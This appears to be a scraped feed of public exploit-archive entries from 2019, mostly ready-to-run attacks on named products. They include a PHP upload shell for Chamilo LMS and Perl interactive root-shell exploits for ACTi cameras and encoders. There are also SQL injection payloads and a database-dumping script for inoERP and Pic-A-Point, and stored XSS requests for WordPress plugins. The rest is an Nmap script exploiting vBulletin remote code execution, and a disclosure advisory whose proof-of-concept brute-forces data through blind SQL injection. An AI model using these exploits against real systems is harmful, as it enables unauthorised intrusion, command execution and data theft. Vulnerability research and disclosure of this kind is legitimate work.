↧
Chrome IndexedDBConnection::Close Use-After-Free
↧
Chamilo LMS 1.11.8 Shell Upload
Chamilo LMS version 1.11.8 suffers from a remote shell upload vulnerability.
cd0f46654104ad90b791bf2c1eeaf810<--
# Exploit Title: Chamillo LMS Arbitrary File Upload
# Google Dork: "powered by chamilo"
# Date: 05/10/2018
# Exploit Author: Sohel Yousef jellyfish security team
# Software Link: https://chamilo.org/en/download/
# Version: Chamilo 1.11.8 or lower to 1.8
# Category: webapps
1. Description
Any registered user can upload files and rename and change the file type to
php5 or php7 by ckeditor module in my files section
register here :
http://localhost/chamilo//main/auth/inscription.php
after registration you can view this sections
http://localhost/chamilo/main/social/myfiles.php
http://localhost/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0
upload your shell in gif format and then rename the format
if the rename function was desabled
and add this GIF89;aGIF89;aGIF89;a before <?PHP
to be like this for examlple
GIF89;aGIF89;aGIF89;a<html>
<head>
<title>PHP Test</title>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="upload file" name="submit">
</form>
</head>
<body>
<?php echo '<p>FILE UPLOAD</p><br>';
$tgt_dir = "uploads/";
$tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']);
echo "<br>TARGET FILE= ".$tgt_file;
//$filename = $_FILES['fileToUpload']['name'];
echo "<br>FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"];
if(isset($_POST['submit']))
{
if(file_exists("uploads/".$_FILES["fileToUpload"]["name"]))
{ echo "<br>file exists, try with another name"; }
else {
echo "<br>STARTING UPLOAD PROCESS<br>";
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"],
$tgt_file))
{ echo "<br>File UPLOADED:- ".$tgt_file; }
else { echo "<br>ERROR WHILE UPLOADING FILE<br>"; }
}
}
?>
</body>
</html>
and uplaod it as php.gif
you can browse the files form right click and click on browse option
↧
↧
ACTi ACM-3100 Camera Remote Command Execution
ACTi ACM-3100 Camera remote command execution exploit.
8513614259f3c20ff4d2204c4b73f788#!/usr/bin/perl
#
# ACTi ACM-3100 Camera Remote Command Execution Exploit
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
# # [test@localhost acti]$ perl actiroot.pl 192.168.1.1
# # [ ACTi ACM-3100 Camera Remote Command Execution Exploit
# # [ =========================================================
# # [ Exploit author: Todor Donev 2019 <todor.donev@gmail.com>
# # # id
# # execute : /sbin/iperf -c ;id &
# # uid=0(root) gid=0(root)
# # # ls -la
# # execute : /sbin/iperf -c ;ls -la &
# # -rwxr-xr-x 1 0 0 14900 test
# # -rwxr-xr-x 1 0 0 32028 80503736
# # -rwxr-xr-x 1 0 0 8872 macdev
# # -rwxr-xr-x 1 0 0 29804 updatem
# # -rwxr-xr-x 1 0 0 31788 update
# # -rwxr-xr-x 1 0 0 28676 mpeg4
# # -rwxr-xr-x 1 0 0 137040 videoconfiguration.cgi
# # lrwxrwxrwx 1 0 0 6 url.cgi -> system
# # -rwxr-xr-x 1 0 0 27780 system
# # drwxr-xr-x 2 0 0 1024 cmd
# # drwxr-xr-x 5 0 0 1024 ..
# # drw-r--r-- 3 0 0 1024 .
# # # ls -la /etc/
# # execute : /sbin/iperf -c ;ls -la /etc/ &
# # -rw-r--r-- 1 0 0 71 hosts
# # drwxr-xr-x 3 0 0 1024 default
# # drwxr-xr-x 2 0 0 1024 config
# # -rwxr-xr-x 1 0 0 5834 protocols
# # drwxr-xr-x 4 0 0 1024 ppp
# # drwxr-xr-x 2 0 0 1024 dhcpc
# # -rwxr-xr-x 1 0 0 211 inittab
# # -rwxr-xr-x 1 0 0 26 host.conf
# # -rwxr-xr-x 1 0 0 534 passwd
# # -rwxr-xr-x 1 0 0 280 group
# # drwxr-xr-x 2 0 0 1024 init.d
# # -rwxr-xr-x 1 0 0 421 profile
# # -rw-r--r-- 1 0 0 25 resolv.conf
# # -rwxr-xr-x 1 0 0 10787 services
# # drwxr-xr-x 2 0 0 1024 thttpd
# # -rwxr-xr-x 1 0 0 251 fstab
# # drwxr-xr-x 13 0 0 1024 ..
# # drwxr-xr-x 8 0 0 1024 .
# # #
# #
use LWP::Simple;
print "[ ACTi ACM-3100 Camera Remote Command Execution Exploit
[ =========================================================
[ Exploit author: Todor Donev 2019 <todor.donev\@gmail.com>
";
if(not defined $ARGV[0])
{
print "[ Usage: perl $0 [target]\n";
print "[ Example: perl $0 192.168.1.1\n\n";
exit;
}
my $host = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0];
while(1)
{
print "\# ";
chomp($cmd = <STDIN>);
if($cmd eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear';}
last if $cmd eq 'exit';
last if is_error(getprint($host."/cgi-bin/test?iperf=;${cmd}"));
print $resp;
}
↧
Samsung Mobile Android SamsungTTS Privilege Escalation
The Samsung Text-to-speech Engine System Component on Android suffers from a local privilege escalation vulnerability. Versions before 3.0.02.7 and 3.0.00.101 are affected.
8f7af7fb883fdaea5d4b41303321e322[CVE-2019-16253] Privilege Escalation in Samsung Mobile Android SamsungTTS Component
Software:
--------
Samsung Text-to-speech Engine System Component on Android
Description:
----------
The Text-to-speech Engine (aka SamsungTTS) before 3.0.02.7/3.0.00.101 for Android allows a local attacker to escalate privilege, e.g., to system privilege. This issue is reported to & confirmed and patched by Samsung Mobile Security Rewards Program under case ID 101755.
Patched version:
------------
- Android N,O or older : 3.0.00.101
- Android P : 3.0.02.7
Impact:
-------
A successful local attack can obtain system privilege on vulnerable phones.
Solution:
---------
Update the TTS component via Galaxy AppStore to newest version or versions later than patched versions listed above.
Credit:
-------
Discovered by Qidan He (a.k.a Edward Flanker, @flanker_hqd). Detailed about this vulnerability will be released shortly after confirmation from Samsung Mobile for responsible disclosure.
------------------
Sincerely
Qidan (a.k.a Flanker)
Website: https://blog.flanker017.me
↧
citecodecrashers Pic-A-Point 1.1 SQL Injection
citecodecrashers Pic-A-Point version 1.1 suffers from a remote SQL injection vulnerability.
4f4ef62ea6e3e6e89104aafdce3e442b# Exploit Title: citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection
# Author: Cakes
# Discovery Date: 2019-09-26
# Vendor Homepage: https://github.com/citecodecrashers/Pic-A-Point
# Software Link: https://github.com/citecodecrashers/Pic-A-Point/archive/master.zip
# Tested Version: 1.1
# Tested on OS: CentOS 7
# CVE: N/A
# Discription:
# Simple SQL injection after application authentication.
# POST Request
# Parameter: Consignment (POST)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: Consignment=1234' AND 9752=(SELECT (CASE WHEN (9752=9752) THEN 9752 ELSE (SELECT 1018 UNION SELECT 3533) END))-- QBEy&Submit=Trace now
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: Consignment=1234' AND (SELECT 4396 FROM(SELECT COUNT(*),CONCAT(0x7162707871,(SELECT (ELT(4396=4396,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hufy&Submit=Trace now
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: Consignment=1234' AND (SELECT 9267 FROM (SELECT(SLEEP(5)))qpkL)-- OiWK&Submit=Trace now
# Type: UNION query
# Title: Generic UNION query (NULL) - 20 columns
Payload: Consignment=1234' UNION ALL SELECT NULL,CONCAT(0x7162707871,0x614b666177515872456a7177706f6b654d54744e75644e4b597648496742464c6346656865654e67,0x716a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- cUud&Submit=Trace now
↧
↧
inoERP 4.15 SQL Injection
inoERP version 4.15 suffers from a remote SQL injection vulnerability.
3adb8f3eac751702e1d7c3f5a4dfc122# Exploit Title: inoERP 4.15 - 'download' SQL Injection
# Date: 2019-09-13
# Exploit Author: Semen Alexandrovich Lyhin
# Vendor Homepage: http://inoideas.org/
# Version: 4.15
# CVE: N/A
# A malicious query can be sent in base64 encoding to unserialize() function.
# It can be deserialized as an array without any sanitization then.
# After it, each element of the array is passed directly to the SQL query.
#!/bin/python
import os
import base64
import requests
import sys
def generatePayload(query):
#THIS FUNCTION IS INSECURE BY DESIGN
b64_query = base64.b64encode(query);
return os.popen("php -r \"echo base64_encode(serialize(base64_decode('" + b64_query + "')));\"").read()
def ExecSQL(query):
data = {"data":query,
"data_type":"sql_query"}
r = requests.post("http://" + ip + "/download.php", data=data)
return r.content
if __name__ == "__main__":
if len(sys.argv) != 3:
print '(+) usage: %s <target> ' % sys.argv[0]
print '(+) eg: %s 127.0.0.1 "ierp/"' % sys.argv[0]
exit()
ip = sys.argv[1] + "/" + sys.argv[2]
#if don't have php, set Payload to the next one to check this SQLi via "select @@version;" payload: czoxNzoic2VsZWN0IEBAdmVyc2lvbjsiOw==
data = r"select * from ino_user;"
print ExecSQL(generatePayload(data));
↧
all-in-one-seo-pack 3.2.7 Cross Site Scripting
all-in-one-seo-pack version 3.2.7 suffers from a persistent cross site scripting vulnerability.
955890e6566325a68242aca7a5a0cb7d# Exploit Title: all-in-one-seo-pack 3.2.7 - Persistent Cross-Site Scripting
# Google Dork: inurl:"\wp-content\plugins\all-in-one-seo-pack"
# Date: 2019-06-13
# Exploit Author: Unk9vvN
# Vendor Homepage: https://semperplugins.com/all-in-one-seo-pack-pro-version
# Software Link: https://wordpress.org/plugins/all-in-one-seo-pack/
# Version: 3.2.7
# Tested on: Windows 10
# CVE: N/A
# Description
# This vulnerability is in the validation mode and is located in the all-in-one-seo-pack tab inside the and the vulnerability type is stored . the vulnerability parameters are as follows.
1.Go to the 'all-in-one-seo-pack' tab
2.Select 'general settings' section
3.Enter the payload in "Additional Front Page Headers","Additional Posts Page Headers" section
4.Click the "Update Options" option
4.Your payload will run on visit page
# URI: http://localhost/wordpress/wp-admin/admin.php?page=all-in-one-seo-pack
# Payload: "><script>alert(1)</script>
#
# PoC
#
POST /wordpress/wp-admin/admin.php?page=all-in-one-seo-pack%2Faioseop_class.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=all-in-one-seo-pack%2Faioseop_class.php
Content-Type: multipart/form-data; boundary=---------------------------24442753012045
Content-Length: 8625
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------24442753012045
Content-Disposition: form-data; name="aiosp_front_meta_tags"
"><script>alert(1)</script>
-----------------------------24442753012045
Content-Disposition: form-data; name="aiosp_home_meta_tags"
"><script>alert(1)</script>
-----------------------------24442753012045
Content-Disposition: form-data; name="Submit"
Update Options »
-----------------------------24442753012045--
# Discovered by:
https://unk9vvn.com
↧
Duplicate-Post 3.2.3 Cross Site Scripting
Duplicate-Post version 3.2.3 suffers from a persistent cross site scripting vulnerability.
bb96cc3f76981e4b29dcc54b43e3427e# Exploit Title: Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2019-06-11
# Exploit Author: Unk9vvN
# Vendor Homepage: https://duplicate-post.lopo.it/
# Software Link: https://wordpress.org/plugins/duplicate-post/
# Version: 3.2.3
# Tested on: Kali Linux
# CVE: N/A
# Description
# This vulnerability is in the validation mode and is located in the plugin management panel and the vulnerability type is stored . the vulnerability parameters are as follows.
1.Go to the 'Settings' section
2.Enter the payload in the "Title prefix", "Title suffix", "Increase menu order by", "Do not copy these fields" sections
3.Click the "Save Changes" option
4.Your payload will run
# URI: http://localhost/wp-admin/options-general.php?page=duplicatepost
# Parameter & Payoad:
duplicate_post_title_prefix="><script>alert(1)</script>
duplicate_post_title_suffix="><script>alert(1)</script>
duplicate_post_increase_menu_order_by="><script>alert(1)</script>
duplicate_post_blacklist="><script>alert(1)</script>
#
# PoC
#
POST /wp-admin/options.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=duplicatepost
Content-Type: application/x-www-form-urlencoded
Content-Length: 981
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
option_page=duplicate_post_group&action=update&_wpnonce=0e8a49a372&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dduplicatepost%26settings-updated%3Dtrue&duplicate_post_copytitle=1&duplicate_post_copyexcerpt=1&duplicate_post_copycontent=1&duplicate_post_copythumbnail=1&duplicate_post_copytemplate=1&duplicate_post_copyformat=1&duplicate_post_copymenuorder=1&duplicate_post_title_prefix=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_title_suffix=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_increase_menu_order_by=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_blacklist=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_roles%5B%5D=administrator&duplicate_post_roles%5B%5D=editor&duplicate_post_types_enabled%5B%5D=post&duplicate_post_types_enabled%5B%5D=page&duplicate_post_show_row=1&duplicate_post_show_submitbox=1&duplicate_post_show_adminbar=1&duplicate_post_show_bulkactions=1&duplicate_post_show_notice=1
# Discovered by:
https://t.me/Unk9vvN
↧
vBulletin 5.x 0-Day Pre-Auth Remote Command Execution
Nmap NSE script that exploits a pre-authentication remote command execution vulnerability in vBulletin versions 5.x.
e75178e2c6510a67c0a70dc3027d65cfdescription = [[
vBulletin 5.x 0day pre-auth RCE exploit
This should work on all versions from 5.0.0 till 5.5.4
]]
local http = require "http"
local shortport = require "shortport"
local vulns = require "vulns"
local stdnse = require "stdnse"
local string = require "string"
---
-- @usage
-- nmap -p <port> --script http-vuln-CVE-2019-16759 <target>
--
-- @output
-- PORT STATE SERVICE
-- s4430/tcp open http
-- | http-vuln-CVE-2019-16759:
-- | VULNERABLE
-- | vBulletin 5.x 0day pre-auth RCE exploit
-- | State: VULNERABLE
-- | IDs: CVE:CVE-2019-16759
-- |
-- | Disclosure date: 2019-09-23
-- | References:
-- | https://seclists.org/fulldisclosure/2019/Sep/31
-- |_ https://nvd.nist.gov/vuln/detail/CVE-2019-16759
--
-- @args http-vuln-cve2019-16759.path The default URL path to request. The default is "/".
author = "r00tpgp"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = { "vuln" }
portrule = shortport.http
action = function(host, port)
local vuln = {
title = "vBulletin 5.x 0day pre-auth RCE exploit",
state = vulns.STATE.NOT_VULN,
description = [[
vBulletin 5.x 0day pre-auth RCE exploit
This should work on all versions from 5.0.0 till 5.5.4
]],
IDS = {
CVE = "CVE-2019-16759"
},
references = {
'https://seclists.org/fulldisclosure/2019/Sep/31',
'https://nvd.nist.gov/vuln/detail/CVE-2019-16759',
},
dates = {
disclosure = { year = '2019', month = '09', day = '23' }
}
}
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local method = stdnse.get_script_args(SCRIPT_NAME..".method") or "POST"
local path = stdnse.get_script_args(SCRIPT_NAME..".path") or "/index.php?routestring=ajax/render/widget_php"
local body = {
["widgetConfig[code]"] = "echo shell_exec(\'echo h4x0000r > /tmp/nmap.check.out; cat /tmp/nmap.check.out\');exit;",
}
local options = {
header = {
Connection = "close",
["Content-Type"] = "application/x-www-form-urlencoded",
["User-Agent"] = "curl/7.65.3",
["Accept"] = "*/*",
},
content = body
}
local response = http.post(host, port, path, nil, nil, body)
if response and string.match(response.body, "h4x0000r") then
vuln.state = vulns.STATE.VULN
end
return vuln_report:make_output(vuln)
end
↧
↧
eBrigade SQL Injection
eBrigade versions prior to 5.0 suffer from multiple remote SQL injection vulnerabilities.
d728e81587531ee5c5d7a44a62cb05a4SEC Consult Vulnerability Lab Security Advisory < 20190926-0 >
=======================================================================
title: Multiple SQL Injection vulnerabilities
product: eBrigade
vulnerable version: <5.0
fixed version: >=5.0
CVE number: CVE-2019-16743, CVE-2019-16744, CVE-2019-16745
impact: critical
homepage: https://ebrigade.net
found: 2019-06-06
by: D. Haintz (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"eBrigade is a web application that allows the management of personnel, vehicles
and equipment of rescue centers (fire brigades), associations of first
responders and military organizations. Highly configurable, eBrigade can meet
the expectations of many other organizations. Skills management, generation of
the cover sheet according to availability. Management of the interventions and
the victims with assessment sheets rescuers. Private social network.
Notifications and alerts by email and SMS. Accounting, reporting and numerous
graphs allow precise monitoring of the organization." (translated)
Source: https://ebrigade.net/
Business recommendation:
------------------------
The vendor provides a patch and users of this product are urged to immediately
upgrade to the latest version available.
An in-depth security analysis performed by security professionals is
highly advised, as the software may be affected from further security
issues.
Vulnerability overview/description:
-----------------------------------
1) Multiple SQL Injection vulnerabilities
Due to insufficient sanitization of user input an authenticated attacker can
execute arbitrary SQL code in several SELECT statements. Since two of the three
vulnerabilities are completely unsanitized and responsible to serve ICAL files,
an attacker can let a user download manipulated calendar files. Besides that an
attacker can also dump the whole database.
The third vulnerability results out of wrong usage of sanitization functions.
This enables an attacker to manipulate the SQL query with specially crafted
requests resulting into a blind SQL injection, as described in one of the
following vulnerabilities.
a) & b) Multiple UNION SQL Injections (CVE-2019-16743, CVE-2019-16744)
The parameters of two links can be manipulated so any arbitrary query to any
table or database can be added to the output of the resulting calendar files
using the UNION functionality of SQL.
c) Boolean-based Blind SQL Injection (CVE-2019-16745)
The parameters of a search result can be manipulated to guess the returned
values of an arbitrary query.
Proof of concept:
-----------------
1) Multiple SQL Injection vulnerabilities
All vulnerabilities were tested with an authenticated user with the lowest
access rights (public). The whole PoC script requires an authenticated user for any
functionality.
The user is authenticated by a PHP session using the cookie PHPSESSID (may
vary at different webservers). In conclusion, every request described below
requires the PHP session cookie.
a) UNION SQL Injection in evenement_ical.php (CVE-2019-16743)
The script evenement_ical.php uses the unsanitized parameter "evenement" to
query the database. The results are written into a downloadable calendar file.
By adding a UNION statement, an attacker can extend the output with arbitrary
data of the database:
The user input is read on line 42:
$evenement=(isset($_GET['evenement'])?$_GET['evenement']:"");
On line 88-89 it is added to the SQL statement:
if ($evenement !="")
$sql .= "\n and e.e_code = $evenement ";
Which is executed and fetched in line 136 and 138:
$res = mysqli_query($dbc,$sql);
while($row=mysqli_fetch_array($res)){
Since e_code is of type integer, the proper sanitization method would be
intval().
POC URL: evenement_ical.php?evenement=1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14--
-> Version after 'LOCATION:'
POC in Python:
import requests
import string
import re
url = input("URL without file (i.e. https://localhost/ebrigade): ")
phpsession = input("PHPSESSID: ")
cookies = {'PHPSESSID': phpsession}
payload = '+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14--'
print("Testing vulnerability")
r = requests.get('{0}/evenement_ical.php?evenement=1{1}'.format(url, payload),
cookies=cookies)
matches = re.findall( r'^LOCATION:(.*)$', r.text, flags=re.MULTILINE)
print("Found version: {0}".format(matches[-1]))
b) UNION SQL Injection in evenements.php (CVE-2019-16744)
The script evenements.php uses the unsanitized parameter "cid" to query the
database. The results are written into a downloadable calendar file. By
breaking out of the string and adding a UNION statement, an attacker can extend
the output with arbitrary data. But the parameter "cid" must start with a valid
cid.
The user input is read on line 48:
$key = (isset($_GET['cid'])?$_GET['cid']:"");
On line 69 it is inserted as SQL string into the query:
$sqlp="select p.p_id, p.p_nom, p.p_prenom, p.p_code, p.p_mdp ,p.p_calendar,
p.p_section section, s.s_code,
md5(concat(p.p_id,'-',p.p_nom,'-',p.p_mdp)) keyp
from pompier p , section s
where p.p_fin is null
and p.p_section = s.s_id
and md5(concat(p.p_id,'-',p.p_nom,'-',p.p_mdp)) = '$key'
Which is executed and fetched on line 72 and 73:
$resp = mysqli_query($dbc,$sqlp);
while($rowp= mysqli_fetch_array($resp)){
Here an attacker can add arbitrary SQL code by breaking out of the string.
Since the expected value is of type string, the proper sanitization method
would be mysqli_real_escape_string().
POC URL: evenements.php?cid=<valid_cid>%27+union+select+1,2,3,4,5,6,7,version(),%279
-> Version can be found in X-WR-CALNAME
POC in Python:
import requests
import string
import re
url = input("URL without file (i.e. https://localhost/ebrigade): ")
phpsession = input("PHPSESSID: ")
valid_cid = input("Valid CID: ")
cookies = {'PHPSESSID': phpsession}
payload = '%27+union+select+1,2,3,4,5,6,7,version(),%279'
print("Testing vulnerability")
r = requests.get('{0}/evenements.php?cid={1}{2}'.format(url, valid_cid, payload), cookies=cookies)
matches = re.findall( r'^X-WR-CALNAME:(.*) - (.*)$', r.text, flags=re.MULTILINE)
print("Found version: {0}".format(matches[0][1]))
c) Blind SQL Injection in evenement_choice.php (CVE-2019-16745)
The script evenement_choice.php uses the wrongly sanitized parameter
"chxCal" as an array to query the database. The results are shown in a search
result. By breaking out, an attacker can extend the query's condition to guess
or brute arbitrary data.
The user input is read on line 108:
$ChxCalendar = (isset($_GET['btGo'])?(isset($_GET['chxCal'])?$_GET['chxCal']
:array()):$chxCal);
On line 169 it is added to the statement by joining the array elements and
wrongly sanitizing it with mysqli_real_escape_string():
$query .= "\n and S.S_ID in (".get_family("$filter").(count($ChxCalendar)>0?",
".mysqli_real_escape_string($dbc,implode(",",$ChxCalendar)):"").")";
Which is executed on line 202:
$result=mysqli_query($dbc,$query);
Here an attacker can add arbitrary SQL code - except quotations - by breaking
out of the list.
Since the expected value of each element is of type integer, the proper
sanitization method would be intval() for each array element.
POC URL: evenement_choice.php?ec_mode=default&page=1&btGo=1&chxCal[0]=5)+and+(ord(substring(version(),0,1))+%3D+49
-> Would return the search results in case the version starts with 1 (since the ASCII value of 1 is 49).
POC in Python:
import requests
import string
url = input("URL without file (i.e. https://localhost/ebrigade): ")
phpsession = input("PHPSESSID: ")
true_payload = ')+and+(1%3D1'
false_payload = ')+and+(1%3D0'
cookies = {'PHPSESSID': phpsession}
print("Testing vulnerability")
r = requests.get('{0}/evenement_choice.php?ec_mode=default&page=1&btGo=1&chxCal[0]=5{1}'.format(url, true_payload),
cookies=cookies)
true_len = len(r.text)
r = requests.get('{0}/evenement_choice.php?ec_mode=default&page=1&btGo=1&chxCal[0]=5{1}'.format(url, false_payload),
cookies=cookies)
false_len = len(r.text)
if (true_len > false_len):
print("Vulnerability verified.")
# get string length
version_len = 0
while
len(requests.get('{0}/evenement_choice.php?ec_mode=default&page=1&btGo=1&chxCal[0]=5)+and+(length(version())+%3D+{1}'.format(url,
version_len),
cookies=cookies).text) == false_len:
version_len += 1
print("Version string has {0} characters.".format(version_len))
# brute version
version_string = ''
for i in range(version_len):
print("Bruting position {0}".format(i+1))
chars = string.ascii_lowercase + string.ascii_uppercase + string.digits + '.-'
for c in chars:
if
len(requests.get('{0}/evenement_choice.php?ec_mode=default&page=1&btGo=1&chxCal[0]=5)+and+(ord(substring(version(),{1},1))+%3D+{2}'.format(url,
i+1, ord(c)), cookies=cookies).text) > false_len:
version_string += c
print("Found new char of version: {0}".format(version_string))
continue
print("Found version: {0}".format(version_string))
else:
print("Could not verify Vulnerability.")
Vulnerable / tested versions:
-----------------------------
The following versions were tested and found to be vulnerable:
- 4.5.1
- 4.5
- 4.4
- 4.3
- 4.2
- 4.1
- 4.0
Vendor contact timeline:
------------------------
2019-06-14: Contacting vendor through https://ebrigade.net/contact/
2019-06-15: Vendor replies to send advisory via unencrypted email
2019-06-17: Sending the advisory to the vendor to the given email address
Vendor acknowledges receipt, plans to release eBrigade version 5.0
with security improvements soon
2019-07-02: Asking vendor for a status update
Vendor: the new release 5.0 will "likely be available next month"
2019-08-14: Asking for a status update; no reply
2019-08-29: Set the release date to 2019-09-26, since release of the fixed version
should be this month and no answer on news was received by the vendor
2019-09-23: Checking the vendor website, verification that a new version has already
been released which fixes the issues
2019-09-26: Public release of security advisory
Solution:
---------
The vendor provides an updated version (v5.0 or higher, v5.0.1) which should be
installed immediately:
https://sourceforge.net/projects/ebrigade/files/
Workaround:
-----------
None.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF David Haintz / @2019
↧
ACTi ACD-2100 Video Encoder Remote Command Execution
ACTi ACD-2100 video encoder remote command execution exploit.
745e2070e39541fdb22cf689631b9103#!/usr/bin/perl
#
# ACTi ACD-2100 Video Encoder Remote Command Execution Exploit
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
# Firmware Version = A1D-220-V3.08.08-AC
# Production ID = ACD2100-08E-X-00498
# Factory Default Type = NTSC, Composite, Two Ways Audio (0x71)
# Company Name = ACTi Corporation
# WEB Site = www.acti.com
# Profile ID = ADV7180-RXX_V071030A
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
# # [ ACTi ACD-2100 Video Encoder Remote Command Execution Exploit
# # [ ============================================================
# # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
# # [ Server: thttpd/2.25b 29dec2003
# # [ The target is vulnerable
# # [
# # [ Directory Traversal
# # [ http://192.168.1.1/cgi-bin/./
# # [ http://192.168.1.1/cgi-bin/../
# # [ http://192.168.1.1/cgi-bin/80503736
# # [ http://192.168.1.1/cgi-bin/cmd/
# # [ http://192.168.1.1/cgi-bin/encoder
# # [ http://192.168.1.1/cgi-bin/macdev
# # [ http://192.168.1.1/cgi-bin/mpeg4
# # [ http://192.168.1.1/cgi-bin/system
# # [ http://192.168.1.1/cgi-bin/test
# # [ http://192.168.1.1/cgi-bin/update
# # [ http://192.168.1.1/cgi-bin/updatem
# # [ http://192.168.1.1/cgi-bin/url.cgi
# # [ http://192.168.1.1/cgi-bin/videoconfiguration.cgi
# # [ http://192.168.1.1/cgi-bin/web1.cgi
# # [
# # [ Got root?
# # [ # id
# # [ execute : /sbin/iperf -c ;id &
# # [ uid=0(root) gid=0(root)
# # [ # cat /etc/passwd
# # [ execute : /sbin/iperf -c ;cat /etc/passwd &
# # [ root::0:0:root:/root:/bin/bash
# # [ bin:*:1:1:bin:/bin:
# # [ daemon:*:2:2:daemon:/usr/sbin:
# # [ sys:*:3:3:sys:/dev:
# # [ adm:*:4:4:adm:/var/adm:
# # [ lp:*:5:7:lp:/var/spool/lpd:
# # [ sync:*:6:8:sync:/bin:/bin/sync
# # [ shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown
# # [ halt:*:8:10:halt:/sbin:/sbin/halt
# # [ mail:*:9:11:mail:/var/spool/mail:
# # [ news:*:10:12:news:/var/spool/news:
# # [ uucp:*:11:13:uucp:/var/spool/uucp:
# # [ operator:*:12:0:operator:/root:
# # [ games:*:13:100:games:/usr/games:
# # [ ftp:*:15:14:ftp:/var/ftp:
# # [ man:*:16:100:man:/var/cache/man:
# # [ nobody:*:65534:65534:nobody:/home:/bin/sh
# # [ # ls -la /var/log
# # [ execute : /sbin/iperf -c ;ls -la /var/log &
# # [ -rw-r--r-- 1 0 0 259 system_info_url.txt
# # [ -rw-r--r-- 1 0 0 259 system_info_web.txt
# # [ -rw-r--r-- 1 0 0 94 wan_info_brief.txt
# # [ -rw-r--r-- 1 0 0 455 systemlog.txt
# # [ drwxr-xr-x 5 0 0 1024 ..
# # [ drwxr-xr-x 2 0 0 1024 .
# # [ # cat cmd/.htpasswd
